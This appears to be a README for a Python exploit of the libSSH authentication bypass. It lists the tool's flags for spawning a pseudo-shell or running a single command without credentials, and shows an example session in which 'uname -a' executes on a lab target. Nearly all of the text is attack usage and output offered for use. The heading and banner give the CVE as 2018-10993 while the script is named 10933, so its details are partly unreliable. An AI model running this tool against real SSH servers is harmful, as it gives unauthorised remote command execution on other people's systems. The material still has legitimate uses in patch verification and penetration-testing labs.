CVE

CVE-2018-10993

Usage

python3 cve-2018-10933.py [OPTIONS] <target>

Flags

$ python3 cve-2018-10933.py -h

    :: CVE-2018-10993 libSSH authentication bypass exploit.
    Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
    Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
    v0.1

usage: cve-2018-10933.py [-h] [-p PORT] [-s] [-c COMMAND] [--logfile LOGFILE]
                         [-v] [-d]
                         host

If there was neither shell nor command option specified - exploit will switch
to detect mode yielding vulnerable/not vulnerable flag.

positional arguments:
  host                  Hostname/IP address that is running vulnerable libSSH
                        server.

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  libSSH port
  -s, --shell           Exploit the vulnerability and spawn pseudo-shell
  -c COMMAND, --command COMMAND
                        Execute single command.
  --logfile LOGFILE     Logfile to write paramiko connection logs
  -v, --verbose         Display verbose output.
  -d, --debug           Display debug output.

Examples

$ python3 cve-2018-10933.py 192.168.56.100 -v -c 'uname -a'

    :: CVE-2018-10993 libSSH authentication bypass exploit.
    Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
    Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
    v0.1

[+] Connected to the target: 192.168.56.100:22
[?] Obtained banner: "SSH-2.0-libssh_0.8.3"
[+] Target seems to be VULNERABLE!
[?] Connecting with 192.168.56.100:22 ...
[+] Connected.

$ uname -a
Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux

URL List